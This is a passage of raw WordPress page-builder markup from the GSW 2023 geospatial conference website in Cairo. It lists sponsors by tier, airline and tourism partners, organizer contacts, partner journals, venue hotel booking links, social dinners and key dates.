border_width=\"10\"][vc_row][vc_column][vc_column_text]</p>\r\n<h4 style=\"text-align: center;\"><strong><span style=\"font-size: 24pt;\">Prime Sponsors</span></strong></h4>\r\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141338959{margin-top: 0px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<p>&nbsp;</p>\r\n<p>&nbsp;</p>\r\n<p><a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141365647{margin-top: 35px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<p>&nbsp;</p>\r\n<p><a href=\"https://www.tra.gov.eg/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5009 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/ntra-300x116.jpg\" alt=\"\" width=\"300\" height=\"116\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141399321{margin-top: 45px !important;}\"]<a href=\"https://www.mbrsc.ae/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5093 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/MBRSC-LOGO_1-01-300x149.png\" alt=\"\" width=\"300\" height=\"149\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141414655{margin-top: 0px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<p>&nbsp;</p>\r\n<p>&nbsp;</p>\r\n<p><a href=\"https://www.esri.com/en-us/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4719\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/ESRI-300x111.jpg\" alt=\"\" width=\"487\" height=\"180\" /></a></p>\r\n<p>&nbsp;</p>\r\n<p style=\"text-align: left;\">[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][/vc_column_inner][vc_column_inner width=\"1/2\"][/vc_column_inner][vc_column_inner][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1692141209167{margin-top: -70px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_column_text]</p>\r\n<h6 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Platinum Sponsors</strong></span></h6>\r\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692144968858{margin-top: 20px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<p><a href=\"https://www.pix4d.com/ \" target=\"_blank\" rel=\"noopener\"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692144942219{margin-top: -100px !important;}\"][vc_row][vc_column][vc_column_text]</p>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffffff;\"><strong>Platinum Sponsors</strong></span></h4>\r\n<p><a href=\"https://abuqir.net/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5005\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/aboquir-239x300.png\" alt=\"\" width=\"193\" height=\"242\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1692141209167{margin-top: -70px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\r\n<p style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #000000;\"><strong>Gold </strong></span><span style=\"color: #000000;\"><strong> Sponsors</strong></span></span></p>\r\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1692145343386{margin-top: -130px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]</p>\r\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\r\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1692145428379{margin-top: 60px !important;}\"]</p>\r\n<h3 style=\"text-align: center;\"></h3>\r\n<p>&nbsp;</p>\r\n<p><span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219836213{margin-top: -px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951584642{margin-top: 45px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][vc_column_text css=\".vc_custom_1688951717998{margin-top: 90px !important;}\"]<a href=\"https://www.agisoft.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4987 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image-300x102.png\" alt=\"\" width=\"300\" height=\"102\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\r\n<h5 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h5>\r\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1692145725824{margin-top: -90px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690459872519{margin-top: 50px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<p>&nbsp;</p>\r\n<p style=\"text-align: center;\"><a href=\"https://www.piesat.cn/en-us/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5053\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/5X5cm-PIESAT-Logo-300x300.png\" alt=\"\" width=\"276\" height=\"276\" /></a></p>\r\n<p>&nbsp;</p>\r\n<p>&nbsp;</p>\r\n<p style=\"text-align: center;\"><a href=\"https://geomatex.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5053\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/32596kmnqz.png\" alt=\"\" width=\"276\" height=\"276\" /></a></p>\r\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1692145657186{margin-top: 50px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<p>&nbsp;</p>\r\n<p>&nbsp;</p>\r\n<p style=\"text-align: center;\"><a href=\"https://www.vexcel-imaging.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4990 \" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image002.jpg\" alt=\"\" width=\"179\" height=\"213\" /></a></p>\r\n<p style=\"text-align: center;\"><a href=\"https://abe.com.eg/\" target=\"_blank\" rel=\"noopener\"><img class=\"wp-image-5339 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/V-ABE-Logo-5.jpg\" alt=\"\" width=\"246\" height=\"185\" /></p><p style=\"text-align: center;\"><a href=\"https://www.esa.gov.eg/\" target=\"_blank\" rel=\"noopener\"><img class=\"wp-image-5339 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/survey.jpg\" alt=\"\" width=\"246\" height=\"185\" /></p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951105389{margin-top: 50px !important;}\"]&nbsp;</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<p>&nbsp;</p>\r\n<p>&nbsp;</p>\r\n<p>&nbsp;</p>\r\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" /><br />\r\n<p style=\"text-align: center;\"><a href=\"https://gsw2023.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/08/mgeo.jpg\" alt=\"\" width=\"324\" height=\"121\" /><br />\r\n[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\r\n<h5 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Bronze Sponsors</strong></span></h5>\r\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1692145894928{margin-top: -60px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1692145841186{margin-top: 50px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<p>&nbsp;</p>\r\n<p><a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690251276274{margin-top: 50px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\r\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-e1690251327743-300x167.png\" alt=\"\" width=\"309\" height=\"172\" /></a></p>\r\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants.</p>\r\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690452445334{margin-top: 50px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Tourism partner</span></h4>\r\n<h4 style=\"text-align: center;\"><a href=\"https://funtrip-travel.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5041\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/LOGO-FINAL2-300x184.jpg\" alt=\"\" width=\"265\" height=\"163\" /></a></h4>\r\n<p style=\"text-align: center;\">Email : <span style=\"color: #3366ff;\"><strong>gsw2023@funtrip-travel.com</strong></span></p>\r\n<p style=\"text-align: center;\">Mobile no and WhatsApp: <span style=\"color: #3366ff;\"><strong>+201221541515</strong></span></p>\r\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Ffuntrip-travel.com%2F|title:FunTrip|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690452582489{margin-top: -15px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For FunTrip More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690600884765{margin-top: 50px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Exhibition organizer</span></h4>\r\n<h4 style=\"text-align: center;\"><a href=\"https://www.purespot.org/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5061\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/Logo-Pure-2-300x300.jpg\" alt=\"\" width=\"151\" height=\"151\" /></a></h4>\r\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt; color: #3366ff;\"><strong>project manager </strong></span><br />\r\n<span style=\"font-size: 8pt;\"><strong>Mr. Omar Mohamed</strong></span><br />\r\n<span style=\"font-size: 8pt;\">Email: omar.mohamed@egypure.org   </span><span style=\"font-size: 8pt;\"> phone : ⁦+20 100 098 8976⁩</span></p>\r\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt;\"><strong>Mr. Ahmed Refaat</strong></span><br />\r\n<span style=\"font-size: 8pt;\">Email: ahmed.refaat@egypure.org   </span><span style=\"font-size: 8pt;\">  phone :⁦+20 100 084 4792</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1691508515384{margin-top: 50px !important;}\"]</p>\r\n<h1 style=\"text-align: center;\">Journals partner</h1>\r\n<h3 style=\"text-align: center;\">The author has the opportunity to publish his/her articles in one of the following journals :</h3>\r\n<p>&nbsp;</p>\r\n<p style=\"text-align: center;\"><span style=\"color: #000000;\"><a style=\"color: #000000;\" href=\"https://www.springer.com/journal/43995/\"><span style=\"font-size: 14pt;\"><strong>Journal of Umm Al-Qura University for Engineering and Architecture</strong></span></a></span></p>\r\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong><a href=\"http://www.springer.com/journal/43995\">www.springer.com/journal/43995</a></strong></span></p>\r\n<h3></h3>\r\n<p>&nbsp;</p>\r\n<p>&nbsp;</p>\r\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt; color: #000000;\"><strong>Journal of Engineering and Thermal Sciences (JETS) ISSN (Online) 2669-2465</strong></span></p>\r\n<p style=\"text-align: center;\"><strong><span style=\"font-size: 14pt;\"><a href=\"http://www.extrica.com/journal/jets\">www.extrica.com/journal/jets</a></span></strong></p>\r\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1687848604610{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 10px !important;}\"]</p>\r\n<h2 style=\"color: #311b92; text-align: center;\"><strong> EGYPT GSW\'2023</strong></h2>\r\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row content_placement=\"top\" css=\".vc_custom_1687710509489{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/3\" css=\".vc_custom_1687711699560{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687711558584{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\r\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity. <a href=\"https://gsw2023.com/index.php/welcome/\"><span style=\"text-decoration: underline;\"><strong><span style=\"color: #3366ff; text-decoration: underline;\">Read More</span></strong></span></a></p>\r\n<p>[/vc_column_text][/vc_column][vc_column width=\"2/3\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" team_position_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1687711659617{margin-top: 0px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\" fadeout_row=\"fadeout_row_value\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#3a3a3a\" overlay_pattern=\"transperant\" overlay_pattern_opacity=\"75\"][vc_column width=\"1/3\"][vc_column_text css=\".vc_custom_1687564704480{margin-top: -4px !important;margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 14pt;\">InterContinental Cairo Semiramis</span></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"298\" height=\"168\" /></span></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Conference Venue </span></h4>\r\n<p>&nbsp;</p>\r\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\r\n<h5></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\r\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fredirect%3Fpath%3Dasearch%26brandCode%3D6C%26localeCode%3Den%26regionCode%3D1%26hotelCode%3DCROHA%26checkInDate%3D01%26checkInMonthYear%3D082023%26checkOutDate%3D08%26checkOutMonthYear%3D082023%26rateCode%3DAAFST%26_PMID%3D99801505%26GPC%3DARA%26cn%3Dno%26viewfullsite%3Dtrue|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690569939761{margin-top: -25px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/3\" awb_type=\"image\"][vc_column_text css=\".vc_custom_1687553105001{margin-top: 0px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt; color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7);\">Ramses Hilton hotel</span></h4>\r\n<h4></h4>\r\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\r\n<p>&nbsp;</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\r\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690251704410{margin-top: 10px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][vc_btn title=\"For More Hotels\" color=\"info\" align=\"center\" link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fhotel-accommodation%2F\"][/vc_column][vc_column width=\"1/3\"][vc_column_text]</p>\r\n<h4 class=\"qrShPb pXs6bb PZPZlf q8U8x aTI8gc EaHP9c\" style=\"text-align: center;\" data-dtype=\"d3ifr\" data-local-attribute=\"d3bn\" data-attrid=\"title\" data-ved=\"2ahUKEwi88f_AuNX_AhU5gv0HHQT_D7wQ3B0oAHoECDsQAQ\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 18pt;\">Flamenco Cairo Hotel</span></h4>\r\n<h4></h4>\r\n<p><a href=\"https://www.flamencohotels.com/web/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter\" src=\"https://www.flamencohotels.com/web/wp-content/uploads/2020/02/4Z4A4470-Low.jpg\" alt=\"\" width=\"281\" height=\"187\" /></a></p>\r\n<p>&nbsp;</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is September 1, 2023</span></h5>\r\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fflamenco-cairo-hotel%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1687570749968{margin-top: 12px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\" css=\".vc_custom_1687570624975{margin-top: 140px !important;}\"][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1687570128641{margin-top: -70px !important;}\"][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692140427657{margin-top: 50px !important;}\"]</p>\r\n<h5 style=\"text-align: center;\"><strong>September 3, 2023</strong></h5>\r\n<h5 style=\"text-align: center;\"><strong><span lang=\"EN-US\">Dinner and Show on </span>Nile Crystal Cruising Restaurant</strong></h5>\r\n<p><img class=\"wp-image-5195 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/d2-1-300x300.jpg\" alt=\"\" width=\"198\" height=\"198\" />[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570551843{margin-top: 50px !important;}\"]</p>\r\n<h5 style=\"text-align: center;\">September 5, 2023</h5>\r\n<h5 style=\"text-align: center;\">Dinner and Show on The Citadel of Cairo</h5>\r\n<p><img class=\"wp-image-5196 size-medium aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/d1-1-300x201.jpg\" alt=\"\" width=\"300\" height=\"201\" />[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][vc_column_text][ultimate_heading main_heading=\"Important Dates\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-top:25px;margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\r\n<ul>\r\n<li style=\"text-align: left;\">\r\n<h5><span style=\"color: #ffffff;\"><strong>Camera ready paper submission: July 15, 2023 </strong></span></h5>\r\n</li>\r\n<li style=\"text-align: left;\">\r\n<h5><span style=\"color: #ffffff;\"><strong>Deadline for submission of travel grants funded by The ISPRS Foundation is: June 16, 2023</strong></span></h5>\r\n</li>\r\n<li style=\"text-align: left;\">\r\n<h5><span style=\"color: #ffffff;\"><strong>Early bird registration deadline: July 1, 2023</strong></span></h5>\r\n</li>\r\n</ul>\r\n<p>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][/vc_column_text][/vc_column][vc_column 